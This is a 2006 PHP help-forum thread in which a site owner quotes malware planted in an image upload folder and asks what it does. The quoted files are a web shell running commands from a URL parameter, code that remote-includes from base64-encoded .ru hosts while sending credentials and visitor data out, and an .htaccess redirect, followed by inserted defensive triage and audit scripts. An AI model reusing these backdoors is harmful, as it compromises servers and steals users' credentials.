Weird Files Created!


6 replies to this topic

#1 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 06:41 AM

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Create.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

.htaccess
Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php

Note: Different file names with different content were in each folder...
Note 2: The files were created by "nobody", the default Apache user...

Is this normal? What is it? What is its purpose?
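
Added example, not part of any post in this thread: a static triage of a dropped PHP file like the ones quoted above, decoding the literals passed to `base64_decode()` without executing anything and flagging the constructs visible in `base.php` and `Create.php`. The rule names, the `triage` helper and the sample (with a placeholder host) are constructed for illustration.

```python
import base64
import re

# String literals handed to base64_decode(), as in the quoted files.
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
RULES = {
    "remote-include": re.compile(
        r'\b(?:include|require)(?:_once)?\s*\(\s*base64_decode', re.I),
    "request-to-shell": re.compile(
        r'\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)',
        re.I),
    "backtick-exec": re.compile(r'`[^`\n]+`'),
    "errors-silenced": re.compile(r'error_reporting\(\s*0\s*\)'),
}

def decode_literals(php_source):
    """Return the decoded text of every literal passed to base64_decode()."""
    decoded = []
    for match in B64_CALL.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # not valid base64, skip it
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded

def triage(php_source):
    """Report which rules fire and what the encoded literals hide."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(php_source))
    decoded = decode_literals(php_source)
    if any(d.lower().startswith(("http://", "https://", "ftp://")) for d in decoded):
        hits.append("encoded-url")
    return {"indicators": hits, "decoded": decoded}

# Constructed sample shaped like base.php; host and parameter are placeholders.
_URL = base64.b64encode(b"http://example.invalid/m.php?r=").decode()
SAMPLE = '''<?php
error_reporting(0);
if(! @include_once(base64_decode("@B64@") . $suffix))
{
    if(isset($_GET["k"])){system($_GET["k"]);}
    print "up" . `uname -a`;
}
?>'''.replace("@B64@", _URL)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run `triage()` on a copy of a suspect file read as text; the decoded strings are the hosts worth searching for in web server and proxy logs.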

#2 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 06:49 AM

I don't know, but I also got a .php file put in my folder one day and it outputted all my code within that folder.

scary?


Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#3 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 06:59 AM

It's VERY scary...
If I don't get this figured out I'm gonna be up ALL night!

#4 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 07:08 AM

Take away the [][] brackets to see the code larger, ok.

#5 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 07:17 AM


If you find that you haven't done any validation on users uploading the correct file extension, then post the relevant upload code.

If you have done that, read on!


OK, you made me paranoid. Now what I did 5 min ago is check phpMyAdmin for any databases that I didn't know of being mine. You should take these steps.

I had no extra ones, thank god.

Now what I understand is that if a hacker got your MySQL details then they can use your database for their own needs, and in some cases also use a folder you didn't know about, but the best practice is to check the database entries and if they're all yours lol............... you're ok, you can sleep tonight ok.

But

in the worst situation, and a person has leeched onto your database, then you have to reset the passwords on all your scripts and database ok.

And then delete any unknown folders and files.

I would suggest a fresh copy of everything ok.

Scary, good luck.

#6 pbjorge12

pbjorge12
  • Members
  • Pip
  • Newbie
  • 9 posts

Posted 01 July 2006 - 07:27 AM

Well...After doing some research, this is an exploit that works with directories with 777 permissions (which mine is).
I am still looking for a fix...
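
Added example, not part of any post in this thread: an audit of an image upload tree for the conditions described here, namely directories with the world-write bit that mode 777 sets, `.htaccess` files, and files whose content is not an image even though a MIME check let them in. The function names, finding labels and the throwaway sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

# Magic bytes for JPEG, PNG and GIF; extend for other accepted formats.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

def audit_upload_tree(root):
    """Return sorted (finding, relative_path) pairs for an image upload tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # Mode 777 sets the "other" write bit: any local account can create files.
        if stat.S_IMODE(os.stat(dirpath).st_mode) & stat.S_IWOTH:
            findings.append(("world-writable-dir", rel_dir))
        for name in files:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if name.lower().startswith(".ht"):
                # .htaccess can change how Apache serves the directory.
                findings.append(("server-config-override", rel))
                continue
            with open(os.path.join(dirpath, name), "rb") as fh:
                head = fh.read(512)
            # Judge by content, not by the MIME type the client supplied.
            if not head.startswith(IMAGE_MAGIC):
                findings.append(("not-an-image", rel))
            if b"<?" in head:
                findings.append(("php-open-tag", rel))
    return sorted(findings)

def build_constructed_tree():
    """Create a throwaway tree shaped like the one in the post (constructed data)."""
    root = tempfile.mkdtemp()
    full = os.path.join(root, "full")
    os.mkdir(full)
    os.chmod(full, 0o777)
    samples = {
        "cover.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "base.php": b"<?php /* placeholder body */ ?>",
        ".htaccess": b"Options -MultiViews\n",
    }
    for name, data in samples.items():
        with open(os.path.join(full, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for finding, path in audit_upload_tree(build_constructed_tree()):
        print(f"{finding:24} {path}")
```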

#7 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 01 July 2006 - 08:34 AM

Explain more, what do you mean, an exploit?


What, they get in 777 folders? How?

lol you make me more worried?